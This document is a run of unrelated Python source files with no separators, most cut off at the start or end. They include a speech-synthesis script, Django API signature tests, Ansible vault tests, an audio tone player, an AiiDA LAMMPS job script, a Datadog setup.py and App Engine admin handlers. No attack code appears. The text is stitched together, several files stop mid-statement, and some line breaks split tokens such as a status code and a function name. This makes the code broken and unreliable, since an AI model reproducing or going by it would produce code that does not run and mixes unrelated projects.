times=read_input_lab(dur_file, pit_file) #tmp_units = tmp_units[128:140]## target_units = np.zeros(len(tmp_units), 'object') for j in xrange(len(tmp_units)): target_units[j] = tmp_units[j] if 0: units, fnames=load_units
() units = units[:int(units.shape[0]*(100.0/100.0))] best_units_indice=search(target_units, units,limit=20) best_units = units[best_units_indice] f=open('tmp2.pkl','w+') import pickle pickle.dump(best_units,f) pickle.dump(fnames,f) f.flush() f.close() else: f=open('tmp2.pkl','r') import pickle best_units=pickle.load(f) fnames=pickle.load(f) #best_units = best_units[128:140]##
f.close() for i in xrange(target_units.shape[0]): print target_units[i].phone, best_units[i].phone, best_units[i].unit_id #wavs=concatenate_units_overlap(best_units, fnames) #gcis = gcis[(gcis>times[128]) * (gcis<times[140])] #gcis -= times[128] ##$frm_time, frm_val = units2for(best_units, fnames, times, frm_time, frm_val) frm_time *= 16000.0 gcis=units2gci(best_units, fnames)##$ gcis = np.array(gcis) ##$gcis *= 16000 gcis = gcis.astype(np.uint32) old_times = np.array(times).copy() old_times *= 16000.0 times=units2dur(best_units, fnames)##$ times = np.array(times) ##$times *= 16000 times = times.astype(np.uint32) #times = times[128:141]## #aa=times[0]## #for i in range(len(times)):## #times[i] -= aa## #frm_time *= 16000 wavs=concatenate_units_psola_har_overlap(best_units, fnames, old_times, times, gcis, frm_time, frm_val, overlap=0.5) #wavs=concatenate_units_nooverlap(best_units, fnames) ftime, fval = get_formant(wavs, 16000) from scipy.io.wavfile import write as wwrite wwrite('out.wav', 16000, wavs) print 'successfully saved out.wav'
import os import os.path from raiden.constants import
RAIDEN_DB_VERSION def database_from_privatekey(base_dir, app_number): """ Format a database path based on the private key and app number. """
dbpath = os.path.join(base_dir, f"app{app_number}", f"v{RAIDEN_DB_VERSION}_log.db") os.makedirs(os.path.dirname(dbpath)) return dbpath
=utf-8 from datetime import datetime, date, time from decimal import Decimal import json import django from django.forms import IntegerField from django.test import TransactionTestCase, Client from django.utils.functional import curry from django.utils.translation import ugettext_lazy import pytz from formapi.api import DjangoJSONEncoder from formapi.compat import smart_u, get_user_model from formapi.models import APIKey from formapi.utils import get_sign TOTAL_TESTS = 19 class SignedRequestTest(TransactionTestCase): def setUp(self): self.api_key = APIKey.objects.create(email="test@example.com") self.api_key_revoked = APIKey.objects.create(email="test3@example.com", revoked=True) self.client = Client() self.user = get_user_model().objects.create(email="user@example.com", username="räksmörgås") self.user.set_password("rosebud") self.user.save() self.authenticate_url = '/api/v1.0.0/user/authenticate/' self.language_url = '/api/v1.0.0/comp/lang/' def send_request(self, url, data, key=None, secret=None, req_method="POST"): if not key: key = self.api_key.key if not secret: secret = self.api_key.secret sign = get_sign(secret, **data) data['key'] = key data['sign'] = sign if req_method == 'POST': return self.client.post(url, data) elif req_method == 'GET': return self.client.get(url, data) def test_api_key(self): smart_u(self.api_key) def test_valid_auth(self): response = self.send_request(self.authenticate_url, {'username': self.user.username, 'password': 'rosebud'}) self.assertEqual(response.status_code, 200) response_data = json.loads(smart_u(response.content)) self.assertEqual(response_data['errors'], {}) self.assertTrue(response_data['success']) self.assertIsNotNone(response_data['data']) def test_invalid_call(self): response = self.send_request('/api/v1.0.0/math/subtract/', {'username': self.user.username, 'password': 'rosebud'}) self.assertEqual(response.status_code, 404) def test_unsigned_auth(self): data = {'username': self.user.username, 'password': 'rosebud'} response = self.client.post(self.authenticate_url, data) self.assertEqual(response.status_code, 401) def test_invalid_sign(self): data = {'username': self.user.username, 'password': 'rosebud'} sign = get_sign(self.api_key.secret, **data) data['key'] = self.api_key.key data['sign'] = sign + "bug" response = self.client.post(self.authenticate_url, data) self.assertEqual(response.status_code, 4
01) def test_invalid_password(self): data = {'username': self.user.username, 'password': '1337hax/x'} response = self.send_request(self.authenticate_url, data) self.assertEqual(response.status_code, 400) response_data = json.loads(smart_u(response.content)) self.assertGreater(len(response_data['errors']), 0) self.assertFalse(response_data['success']) self.assertFalse(response_data['data'
]) def test_invalid_parameters(self): data = {'email': self.user.email, 'password': 'rosebud'} response = self.send_request(self.authenticate_url, data) self.assertEqual(response.status_code, 401) def test_revoked_api_key(self): data = {'username': self.user.username, 'password': 'rosebud'} response = self.send_request(self.authenticate_url, data, self.api_key_revoked.key, self.api_key_revoked.secret) self.assertEqual(response.status_code, 401) def test_get_call(self): data = {'username': self.user.username, 'password': '1337haxx'} response = self.send_request(self.authenticate_url, data, req_method='GET') self.assertEqual(response.status_code, 200) def test_multiple_values(self): data = {'languages': ['python', 'java']} response = self.send_request(self.language_url, data, req_method='GET') self.assertEqual(response.status_code, 200) class HMACTest(TransactionTestCase): def setUp(self): self.api_key = APIKey.objects.create(email="test@example.com") def test_parameter_sign(self): # test unicode url_params = u'first_name=mårten&last_name=superkebab' dict_params = {'first_name': u'mårten', 'last_name': u'superkebab'} self.assert_equal_signs(url_params, dict_params) # test string url_params = 'first_name=mårten&last_name=superkebab' dict_params = {'first_name': 'mårten', 'last_name': 'superkebab'} self.assert_equal_signs(url_params, dict_params) # test integer url_params = u'dividend=4&divisor=2' dict_params = {'dividend': 4, 'divisor': 2} self.assert_equal_signs(url_params, dict_params) # test boolean url_params = u'secure=True' dict_params = {'secure': True} self.assert_equal_signs(url_params, dict_params) def assert_equal_signs(self, url_params, dict_params): sign1 = get_sign(self.api_key.secret, querystring=url_params) sign2 = get_sign(self.api_key.secret, **dict_params) self.assertEqual(sign1, sign2) class UnsignedRequestTest(TransactionTestCase): def setUp(self): self.client = Client() self.divide_url = '/api/v1.0.0/math/divide/' def test_ok_call(self): data = {'dividend': 7, 'divisor': 2} response = self.client.post(self.divide_url, data) self.assertEqual(response.status_code, 200) response_data = json.loads(smart_u(response.content)) self.assertEqual(response_data['data'], 3.5) def test_invalid_call(self): data = {'dividend': "a", 'divisor': 2} response = self.client.post(self.divide_url, data) self.assertEqual(response.status_code, 400) response_data = json.loads(smart_u(response.content)) dividend_error = response_data['errors']['dividend'] self.assertEqual(dividend_error[0], smart_u(IntegerField().error_messages['invalid'])) self.assertGreater(len(response_data['errors']), 0) self.assertFalse(response_data['success']) self.assertFalse(response_data['data']) def test_error_call(self): data = {'dividend': "42", 'divisor': 0} response = self.client.post(self.divide_url, data) response_data = json.loads(smart_u(response.content)) self.assertFalse(response_data['success']) class JSONEncoderTest(TransactionTestCase): def setUp(self): self.dumps = curry(json.dumps, cls=DjangoJSONEncoder) def test_datetime_encode(self): naive_micro_datetime = {'datetime': datetime.now(), 'int': 1} self.dumps(naive_micro_datetime) naive_second_datetime = {'datetime': datetime.now().strftime("%Y-%m-%d %H:%M:%S")} self.dumps(naive_second_datetime) tz_utc_datetime = {'datetime': datetime.now().replace(tzinfo=pytz.UTC)} self.dumps(tz_utc_datetime) datetime_date = {'datetime': date.today()} self.dumps(datetime_date) naive_datetime_time = {'datetime': time()} self.dumps(naive_datetime_time) naive_datetime_micro_time = {'datetime': time(microsecond=100)} self.dumps(naive_datetime_micro_time) def test_decimal_encode(self): decimal_data = {'decimal': Decimal("1.504")} self.dumps(decimal_data) def test_queryset(self): user_manager = get_user_model().objects user_manager.create(username="test", email="test@example.com") queryset = {'queryset': user_manager.all()} self.dumps(queryset) self.dumps(user_manager.all()) def test_values_list(self): if django.VERSION < (1, 9): user_manager = get_user_model().objects user_manager.create(username="test", email="test@example.com") values = user_manager.values('id', 'email') self.dumps(values) values_list = user_manager.values_list('id', flat=True) s
''' 20140213 Import CSV Data - Dict Save as JASON? Basic Stats Save to file Find Key Words Generate Reports... Generate Plots ''' import csv import numpy as np import matplotlib as mpl from scipy.stats import nanmean filename = '20140211_ING.csv' ###____________ Helper ___________### def number_fields(data): '''gets numeric fields from loaded csv data''' names = data.dtype.names dtypes = data.dtype NUM_FIELDS = [] for i in range(len(names)): if ('float' in str(dtypes[i])) or ('int' in str(dtypes[i])): NUM_FIELDS.append(str(names[i])) return NUM_FIELDS def string_fields(data): '''gets text fields from loaded csv data''' names = data.dtype.names dtypes = data.dtype STRING_FIELDS = [] for i in range(len(names)): if 'S' in str(dtypes[i]): STRING_FIELDS.append(str(names[i])) return STRING_FIELDS def count_vals(array): vals = len(array) for i in array: if np.isnan(i): vals = vals - 1 return vals def number_summary(data, num_fields): '''take data and numeric feilds and do stuff''' sum_dict = {} for i in num_fields: sum_dict[i] = {} sum_dict[i]['Mean'] = nanmean(data[i]) sum_dict[i]['#Values'] = count_vals(data[i]) sum_dict[i]['Max'] = np.nanmax(data[i]) sum_dict[i]['Min'] = np.nanmin(data[i]) return sum_dict ###________ reports _________### def basic_report(filename): '''prints summary report form file''' data = np.recfromcsv(filename) NUM_COL = len(data.dtype.names) NUM_ROW = len(data) NAMES = data.dtype.names DTYPES = data.dtype print('--------------------') print('---- CSV REPORT ----') print('--------------------') print('') print('Filename: \t %s' % filename) print('') print('# records: \t %s' % NUM_ROW) print('# columns: \t %s' % NUM_COL) print('') print('--------------------') print('- name - data type ') for i in range(len(NAMES)): print('-- %s \t %s --' % (NAMES[i], DTYPES[i])) print('--------------------') def numeric_report(filename): data = np.recfromcsv(filename) fields = number_fields(data) d = number_summary(data, fields) print('------------------------') print('---- NUMERIC REP
ORT ----') print('------------------------') print('') print('Filename: \t %s' % filename) print('') print('--------------------') for i in fields: print('FIELD: \t\t %s' % i) print('#Values: \t %s' % d[i]['#Values']) print('M
ax: \t\t %s' % d[i]['Max']) print('Min: \t\t %s' % d[i]['Min']) print('Mean: \t\t %s' % round(d[i]['Mean'], 2)) print('--------------------') print('') ###________ main _________### def main(filename): basic_report(filename) print("") numeric_report(filename) main(filename)
# -*- coding: utf-8 -*- # Created By: Virgil Dupras # Created On: 2009-09-19 # Copyright 2010 Hardcoded Software (http://www.hardcoded.net) # # This software is licensed under the "BSD" License as described in the "LICENSE" file, # which should be included with this package. The terms are also available at # http://www.hardcoded.net/licenses/bsd_license from PyQt4.QtCore import SIGNAL, Qt from PyQt4.QtGui import QWidget, QHeaderView from fs_model import FSModel, IGNORE_BOX_NAME from ui.ignore_box_ui import Ui_IgnoreBox class IgnoreBoxModel(FSModel): def __init__(self, app): FSModel.__init__(self, app, app.board.ignore_box, IGNORE_BOX_NAME) self.connect(self.app, SIGNAL('ignoreBoxChanged()'), self.ignoreBoxChanged) #--- Events def ignoreBoxChanged(self): self.reset() class IgnoreBox(QWidget, Ui_IgnoreBox): def __init__(self, app): QWidget.__init__(self, None) self.app = app self.boxModel = IgnoreBoxModel(app) self._setupUi()
self.connect(self.browserView.selectionModel(), SIGNAL('selectionChanged(QItemSelection,QItemSelection)'), self.browserSelectionChanged) def _setupUi(self): self.setupUi(self) self.setWindowFlags(Qt.Tool) self.browserView.setMod
el(self.boxModel) h = self.browserView.header() h.setResizeMode(QHeaderView.Fixed) h.resizeSection(1, 120) h.setResizeMode(0, QHeaderView.Stretch) #--- Events def browserSelectionChanged(self, selected, deselected): selectedIndexes = self.browserView.selectionModel().selectedRows() nodes = [index.internalPointer() for index in selectedIndexes] items = [node.ref for node in nodes] self.app.selectBoardItems(items)
"""The WaveBlocks Project Compute the transformation to the eigen basis for wavefunction. @author: R. Bourquin @copyright: Copyright (C) 2012, 2016 R. Bourquin @license: Modified BSD License """ from WaveBlocksND import BlockFactory from WaveBlocksND import WaveFunction from WaveBlocksND import BasisTransformationWF def transform_wavefunction_to_eigen(iomin, iomout, blockidin=0, blockidout=0): """Compute the transformation to the eigenbasis for a wavefunction. Save the result back to a file. :param iomin: An :py:class:`IOManager: instance providing the simulation data. :param iomout: An :py:class:`IOManager: instance for saving the transformed data. :param blockidin: The data block from which the values are read. Default is `0`. :param blockidout: The data block to which the values are written. Default is `0`. """ parameters = iomin.load_parameters() # Number of time steps we saved timesteps = iomin.load_wavefunction_timegrid(blockid=blockidin) nrtimesteps = timestep
s.shape[0] iomout.add_wavefunction(parameters, timeslots=nrtimesteps, blockid=blockidout) # The grid on the domain grid = BlockFactory().create_grid(para
meters) # The potential used Potential = BlockFactory().create_potential(parameters) # Basis transformator BT = BasisTransformationWF(Potential) BT.set_grid(grid) # And two empty wavefunctions WF = WaveFunction(parameters) WF.set_grid(grid) # Iterate over all timesteps for i, step in enumerate(timesteps): print(" Compute eigentransform at timestep %d" % step) # Retrieve simulation data values = iomin.load_wavefunction(timestep=step, blockid=blockidin) values = [values[j, ...] for j in range(parameters["ncomponents"])] WF.set_values(values) # Project wavefunction values to eigenbasis BT.transform_to_eigen(WF) # Save the transformed values iomout.save_wavefunction(WF.get_values(), timestep=step, blockid=blockidout)
try: import ossaudiodev except: print "ossaudiodev not installed" ossaudiodev = None try: import FFT except: print "FFT not installed" ossaudiodev = None try: import Numeric except: print "Numeric not installed" ossaudiodev = None import struct, math, time, threading, copy def add(s1, s2): return minmax([(v1 + v2) for (v1, v2) in zip(s1, s2)]) def minmax(vector): return [min(max(v,0),255) for v in vector] def scale(sample, value): return minmax([((s - 128) * value) + 128 for s in sample]) def sine(freqs, seconds, volume = 1.0, sample_rate = 8000.0): sample = [128] * int(sample_rate * seconds) if type(freqs) == type(0): freqs = [freqs] for freq in freqs: for n in range(len(sample)): sample[n] += int(127 * math.sin(n * 2 * math.pi * freq/sample_rate) * volume) return minmax(sample) class SoundThread(threading.Thread): def __init__(self, parent, name = "sound thread"): threading.Thread.__init__(self, name = name) self.parent = parent self.event = threading.Event() self.start() def run(self): while not self.event.isSet(): self.parent.lock.acquire() buffer = copy.copy(self.parent.buffer) self.parent.buffer = None self.parent.lock.release() if buffer != None: self.parent.dev.write("".join(map(chr,buffer))) self.parent.dev.flush() self.event.wait(.001) def join(self, timeout=None): self.event.set() threading.Thread.join(self, timeout) class SoundDevice: def __init__(self, device, async = 0, cache = 1): self.device = device self.async = async self.cache = cache self.cacheDict = {} self.status = "closed" self.number_of_channels= 1 self.sample_rate= 8000 self.sample_width= 1 self.minFreq = 20 self.maxFreq = 3500 self.debug = 0 self.buffer = None if ossaudiodev != None: self.format = ossaudiodev.AFMT_U8 if self.debug: self.setFile("770.txt") if self.async: self.lock = threading.Lock() self.thread = SoundThread(self) def initialize(self, mode): if ossaudiodev == None: return self.dev = ossaudiodev.open("/dev/dsp", mode) self.dev.setparameters(self.format, self.number_of_channels, self.sample_rate) self.status = mode def play(self, sample): """ """ if ossaudiodev == None: return if self.status != "w": self.initialize("w") if self.async: self.lock.acquire() self.buffer = sample self.lock.release() else: self.dev.write("".join(map(chr,sample))) self.dev.flush() def playTone(self, freqs, seconds, volume = 1.0): """ freq example: playTone([550,400], .1, volume=.5) # middle C for .1 seconds, half volume """ if ossaudiodev == None: return if type(freqs) == type(0): freqs = [freqs] if self.status != "w": self.initialize("w") sample = [128] * i
nt(self.sample_rate * seconds) for freq in freqs: if self.cache and (freq,seconds) in self.cacheDict:
sample = self.cacheDict[(freq,seconds)] else: for n in range(len(sample)): sample[n] = min(max(sample[n] + int(127 * math.sin(n * 2 * math.pi * freq/self.sample_rate) * volume), 0),255) self.cacheDict[(freq,seconds)] = sample if self.async: self.lock.acquire() self.buffer = sample self.lock.release() else: self.dev.write("".join(map(chr,sample))) self.dev.flush() def read(self, seconds): if ossaudiodev == None: return if self.status != "r": self.initialize("r") buffer = self.dev.read(int(self.sample_rate * seconds)) size = len(buffer) return struct.unpack(str(size) + "B", buffer) def setFile(self, filename): if ossaudiodev == None: return self.filename = filename self.fp = open(self.filename, "r") def readFile(self, seconds): if ossaudiodev == None: return data = None try: data = eval(self.fp.readline()) except: self.fp = open(self.filename, "r") try: data = eval(self.fp.readline()) except: print "Failed reading file '%s'" % self.filename time.sleep(seconds) return data[:int(seconds * self.sample_rate)] def getFreq(self, seconds): # change to read from the buffer, rather than block if ossaudiodev == None: return if self.debug: data = self.readFile(1) else: data = self.read(seconds) transform = FFT.real_fft(data).real minFreqPos = self.minFreq maxFreqPos = self.maxFreq freq = Numeric.argmax(transform[1+minFreqPos:maxFreqPos]) value = transform[1+minFreqPos:maxFreqPos][freq] domFreq = (freq + self.minFreq) / seconds if self.debug and abs(value) > 8000 and self.minFreq < domFreq < self.maxFreq: print "Frequence:", domFreq, "Value:", value, "Volume:", transform[0] return (domFreq, value, transform[0]) def close(self): if ossaudiodev == None: return if self.status != "closed": self.dev.close() self.status = "closed" if __name__ == "__main__": sd = SoundDevice("/dev/dsp", async = 1) sd.playTone(500, 1) ## DTMF Tones ## 1209 Hz 1336 Hz 1477 Hz 1633 Hz ## ABC DEF ## 697 Hz 1 2 3 A ## GHI JKL MNO ## 770 Hz 4 5 6 B ## PRS TUV WXY ## 852 Hz 7 8 9 C ## oper ## 941 Hz * 0 # D
# (c) 2014, James Tanner <tanner.jc@gmail.com> # (c) 2014, James Cammarata, <jcammarata@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import sys import os import tempfile from nose.plugins.skip import SkipTest from ansible.compat.tests import unittest from ansible.compat.tests.mock import patch from ansible import errors from ansible.parsing.vault import VaultLib from ansible.parsing.vault import VaultEditor from ansible.module_utils._text import to_bytes, to_text # Counter import fails for 2.0.1, requires >= 2.6.1 from pip try: from Crypto.Util import Counter HAS_COUNTER = True except ImportError: HAS_COUNTER = False # KDF import fails for 2.0.1, requires >= 2.6.1 from pip try: from Crypto.Protocol.KDF import PBKDF2 HAS_PBKDF2 = True except ImportError: HAS_PBKDF2 = False # AES IMPORTS try: from Crypto.Cipher import AES as AES HAS_AES = True except ImportError: HAS_AES = False v10_data = """$ANSIBLE_VAULT;1.0;AES 53616c7465645f5fd0026926a2d415a28a2622116273fbc90e377225c12a347e1daf4456d36a77f9 9ad98d59f61d06a4b66718d855f16fb7bdfe54d1ec8aeaa4d06c2dc1fa630ae1846a029877f0eeb1 83c62ffb04c2512995e815de4b4d29ed""" v11_data = """$ANSIBLE_VAULT;1.1;AES256 62303130653266653331306264616235333735323636616539316433666463323964623162386137 3961616263373033353631316333623566303532663065310a393036623466376263393961326530 64336561613965383835646464623865663966323464653236343638373165343863623638316664 3631633031323837340a396530313963373030343933616133393566366137363761373930663833 3739""" class TestVaultEditor(unittest.TestCase): def setUp(self): pass def tearDown(self): pass def test_methods_exist(self): v = VaultEditor(None) slots = ['create_file', 'decrypt_file', 'edit_file', 'encrypt_file', 'rekey_file', 'read_data', 'write_data', 'shuffle_files'] for slot in slots: assert hasattr(v, slot), "VaultLib is missing the %s method" % slot @patch.object(VaultEditor, '_editor_shell_command') def test_create_file(self, mock_editor_shell_command): def sc_side_effect(filename): return ['touch', filename] mock_editor_shell_command.side_effect = sc_side_effect tmp_file = tempfile.NamedTemporaryFile() os.unlink(tmp_file.name) ve = VaultEditor("ansible") ve.create_file(tmp_file.name) self.assertTrue(os.path.exists(tmp_file.name)) def test_decrypt_1_0(self): # Skip testing decrypting 1.0 files if we don't have access to AES, KDF or Counter. if not HAS_AES or not HAS_COUNTER or not HAS_PBKDF2: raise SkipTest v10_file = tempfile.NamedTemporaryFile(delete=False) with v10_file as f: f.write(to_bytes(v10_data)) ve = VaultEditor("ansible") # make sure the password functions for the cipher error_hit = False try: ve.decrypt_file(v10_file.name) except errors.AnsibleError: error_hit = True # verify decrypted content f = open(v10_file.name, "rb") fdata = to_text(f.read()) f.close() os.unlink(v10_file.name) assert error_hit is False, "error decrypting 1.0 file" assert fdata.strip() == "foo", "incorrect decryption of 1.0 file: %s" % fdata.strip() def test_decrypt_1_1(self): if not HAS_AES or not HAS_COUNTER or not HAS_PBKDF2: raise SkipTest v11_file = tempfile.NamedTemporaryFile(delete=False) with v11_file as f: f.write(to_bytes(v11_data)) ve = VaultEditor("ansible") # make sure the password functions for the cipher error_hit = False try: ve.decrypt_file(v11_file.name) except errors.AnsibleError: error_hit = True # verify decrypted content f = open(v11_file.name, "rb") fdata = to_text(f.read()) f.close() os.unlink(v11_file.name) assert error_hit is False, "error decrypting 1.0 file" assert fdata.strip() == "foo", "incorrect decryption of 1.0 file: %s" % fdata.strip() def test_rekey_migration(self): # Skip testing rekeying files if we don't have access to AES, KDF or Counter. if not HAS_AES or not HAS_COUNTER or not HAS_PBKDF2: raise SkipTest v10_file = tempfile.NamedTemporaryFile(delete=False) with v10_file as f: f.write(to_bytes(v10_data)) ve = VaultEditor("ansible") # make sure the password functions for the cipher error_hit = False try: ve.rekey_file(v10_file.name, 'ansible2') except errors.AnsibleError: error_hit = True # verify decrypted content f = open(v10_file.name, "rb") fdata = f.read() f.close() assert error_hit is False, "error rekeying 1.0 file to 1.1" # ensure filedata can be decrypted, is 1.1 and is AES256 vl = VaultLib("ansible2") dec_data = None error_hit = False try: dec_dat
a = vl.decrypt(fdata) except errors.AnsibleError: error_hit = True os.unlink(v10_file.name) assert vl.cipher_name == "AES256", "wrong cipher name set after rekey: %s" % vl.cipher_name assert error_hit is False, "error decrypting migrated
1.0 file" assert dec_data.strip() == b"foo", "incorrect decryption of rekeyed/migrated file: %s" % dec_data
def main(): a=r
aw_input() print a
.lstrip() print "Hello world" main()
from __future__ import absolute_import fro
m jinja2 import Markup from rstblog.programs import RSTProgram import typogrify class TypogrifyRSTProgram(RSTProgram): def get_fragments(self): if self._fragment_cache is not None: return self._fragment_cache with self.context.open_source_file() as f: self.get_header(f) rv = self.context.render_rst(f.read().decode('utf-8')) rv['fragment'] =
Markup(typogrify.typogrify(rv['fragment'])) self._fragment_cache = rv return rv def setup(builder): builder.programs['rst'] = TypogrifyRSTProgram
from aiida import load_dbenv load_dbenv() from aiida.orm import Code, DataFactory import numpy as np StructureData = DataFactory('structure') ParameterData = DataFactory('parameter') codename = 'lammps_md@boston' ############################ # Define input parameters # ############################ a = 5.404 cell = [[a, 0, 0], [0, a, 0], [0, 0, a]] symbols=['Si'] * 8 scaled_positions = [(0.875, 0.875, 0.875), (0.875, 0.375, 0.375), (0.375, 0.875, 0.375), (0.375, 0.375, 0.875), (0.125, 0.125, 0.125), (0.125, 0.625, 0.625), (0.625, 0.125, 0.625), (0.625, 0.625, 0.125)] structure = StructureData(cell=cell) positions = np.dot(scaled_positions, cell) for i, scaled_position in enumerate(scaled_positions)
: structure.append_atom(position=np.dot(scaled_position, cell).tolist(), symbols=symbols[i]) structure.store() # Silicon(C) Tersoff tersoff_si = {'Si Si Si ': '3.0 1.0 1.7322 1.0039e5 16.218 -0.59826 0.78734 1.0999e-6 1.7322 471.18 2.85 0.15 2.4799 1830.8'} potential ={'pair_style': 'tersoff', 'data': tersoff_si} lammps_machine = { 'num_machines': 1, 'parallel_env': 'mpi*', 'tot_num_mpiprocs': 16}
parameters_md = {'timestep': 0.001, 'temperature' : 300, 'thermostat_variable': 0.5, 'equilibrium_steps': 100, 'total_steps': 2000, 'dump_rate': 1} code = Code.get_from_string(codename) calc = code.new_calc(max_wallclock_seconds=3600, resources=lammps_machine) calc.label = "test lammps calculation" calc.description = "A much longer description" calc.use_code(code) calc.use_structure(structure) calc.use_potential(ParameterData(dict=potential)) calc.use_parameters(ParameterData(dict=parameters_md)) test_only = False if test_only: # It will not be submitted import os subfolder, script_filename = calc.submit_test() print "Test_submit for calculation (uuid='{}')".format(calc.uuid) print "Submit file in {}".format(os.path.join( os.path.relpath(subfolder.abspath), script_filename)) else: calc.store_all() print "created calculation; calc=Calculation(uuid='{}') # ID={}".format( calc.uuid, calc.dbnode.pk) calc.submit() print "submitted calculation; calc=Calculation(uuid='{}') # ID={}".format( calc.uuid, calc.dbnode.pk)
from codecs import open # To use a consistent encoding from os import path from setuptools import setup HERE = path.dirname(path.abspath(__file__)) # Get version info ABOUT = {} with open(path.join(HERE, 'datadog_checks', 'riak_repl', '__about__.py')) as f: exec(f.read(), ABOUT) # Get the long description from the README file with open(path.join(HERE, 'README.md'), encoding='utf-8') as f: long_description = f.read() def get_dependencies(): dep_file = path.join(HERE, 'requirements.in') if not path.isfile(dep_file): return [] with open(dep_file, encoding='utf-8') as f: return f.readlines() def parse_pyproject_array(name): import os import re from ast imp
ort literal_eval pattern = r'^{} = (\[.*?\])$'.format(name) with open(os.path.join(HERE, 'pyproject.toml'), 'r',
encoding='utf-8') as f: # Windows \r\n prevents match contents = '\n'.join(line.rstrip() for line in f.readlines()) array = re.search(pattern, contents, flags=re.MULTILINE | re.DOTALL).group(1) return literal_eval(array) CHECKS_BASE_REQ = parse_pyproject_array('dependencies')[0] setup( name='datadog-riak_repl', version=ABOUT['__version__'], description='The Riak_repl check', long_description=long_description, long_description_content_type='text/markdown', keywords='datadog agent riak_repl check', # The project's main homepage. url='https://github.com/DataDog/integrations-extras', # Author details author='Britt Treece', author_email='britt.treece@gmail.com', # License license='BSD-3-Clause', # See https://pypi.org/classifiers classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'Topic :: System :: Monitoring', 'License :: OSI Approved :: BSD License', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', ], # The package we're going to ship packages=['datadog_checks', 'datadog_checks.riak_repl'], # Run-time dependencies install_requires=[CHECKS_BASE_REQ], extras_require={'deps': parse_pyproject_array('deps')}, # Extra files to ship with the wheel package include_package_data=True, )
import os,sys,re # EXTRACTING ALL FILENAMES AND THEIR CLIENTS # --------------------------------------------------- # read in the log # --------------------------------------------------- f=open(sys.argv[1],'rb') data=f.readlines() f.close() n=0 t=len(data) clients = [] filename = None for l in data : n = n + 1 parts = l.split()
# new file to ingest if parts[6] == 'Read' : # all products will have its first cli
ent as "allproducts" if filename != None : if len(clients) == 0 : clients.append('allproducts') else : clients.sort() clients.insert(0,'allproducts') print("%s %s" % (filename,','.join(clients)) ) filepath = parts[-1] filename = filepath.split('/')[-1] fparts = filename.split(':') # :20070409000009 trailing get rid of it if fparts[-1][:2] == '20' and len(fparts[-1]) == 14 : fparts = fparts[:-1] # '::' trailing get rid of it if fparts[-1] == '' : fparts = fparts[:-1] filename = ':'.join(fparts) clients = [] if parts[6] == 'Written' : filepath = parts[-1] client = 'conversion_' +filepath.split('/')[1] if client == 'conversion_ppmtogif' : client = 'cvt_togif' if client == 'conversion_rawtodfx' : continue clients.append(client) if parts[6] == 'create_link:' : filepath = parts[-1] client = filepath.split('/')[4] clients.append(client) if len(clients) == 0 : clients.append('allproducts') else : clients.sort() clients.insert(0,'allproducts') print("%s %s" % (filename,','.join(clients)) )
# -*- coding: utf-8 -*- import webapp2 from boilerplate import models from boilerplate import forms from boilerplate.handlers import BaseHandler from google.appengine.datastore.datastore_query import Cursor from google.appengine.ext import ndb from google.appengine.api import users as googleusers from collections import OrderedDict, Counter from wtforms import fields class Logout(BaseHandler): def get(self): self.redirect(googleusers.create_logout_url(dest_url=self.uri_for('home'))) class Geochart(BaseHandler): def get(self): users = models.User.query().fetch(projection=['country']) users_by_country = Counter() for
user in users: if user.country: users_by_country[user.country] += 1 params = {
"data": users_by_country.items() } return self.render_template('admin/geochart.html', **params) class EditProfileForm(forms.EditProfileForm): activated = fields.BooleanField('Activated') class List(BaseHandler): def get(self): p = self.request.get('p') q = self.request.get('q') c = self.request.get('c') forward = True if p not in ['prev'] else False cursor = Cursor(urlsafe=c) if q: qry = models.User.query(ndb.OR(models.User.last_name == q, models.User.email == q, models.User.username == q)) else: qry = models.User.query() PAGE_SIZE = 5 if forward: users, next_cursor, more = qry.order(models.User.key).fetch_page(PAGE_SIZE, start_cursor=cursor) if next_cursor and more: self.view.next_cursor = next_cursor if c: self.view.prev_cursor = cursor.reversed() else: users, next_cursor, more = qry.order(-models.User.key).fetch_page(PAGE_SIZE, start_cursor=cursor) users = list(reversed(users)) if next_cursor and more: self.view.prev_cursor = next_cursor self.view.next_cursor = cursor.reversed() def pager_url(p, cursor): params = OrderedDict() if q: params['q'] = q if p in ['prev']: params['p'] = p if cursor: params['c'] = cursor.urlsafe() return self.uri_for('user-list', **params) self.view.pager_url = pager_url self.view.q = q params = { "list_columns": [('username', 'Username'), ('last_name', 'Last Name'), ('email', 'E-Mail'), ('country', 'Country')], "users" : users, "count" : qry.count() } # FIXME: admin_user should probably go into BaseHandler params['admin_user'] = googleusers.is_current_user_admin() return self.render_template('admin/users.html', **params) class Edit(BaseHandler): def get_or_404(self, user_id): try: user = models.User.get_by_id(long(user_id)) if user: return user except ValueError: pass self.abort(404) def edit(self, user_id): if self.request.POST: user = self.get_or_404(user_id) if self.form.validate(): self.form.populate_obj(user) user.put() self.add_message("Changes saved!", 'success') return self.redirect_to("user-edit", user_id=user_id) else: self.add_message("Could not save changes!", 'error') else: user = self.get_or_404(user_id) self.form.process(obj=user) params = { 'user' : user } return self.render_template('admin/edituser.html', **params) @webapp2.cached_property def form(self): return EditProfileForm(self)
import asyncio from unittest import mock from aiorpcx import RPCError from server.env import Env from server.controller import Controller loop = asyncio.get_event_loop() def set_env(): env = mock.create_autospec(Env) env.coin = mock.Mock() env.loop_policy = None env.max_sessions = 0 env.max_subs = 0 env.max_send = 0 env.bandwidth_limit = 0 env.identities = '' env.tor_proxy_host = env.tor_proxy_port = None env.peer_discovery = env.PD_SELF = False env.daemon_url = 'http://localhost:8000/' return env async def coro(res): return res def raise_e
xception(msg): raise RPCError(1, msg) def ensure_text_exception(test, exception): res = err = None try:
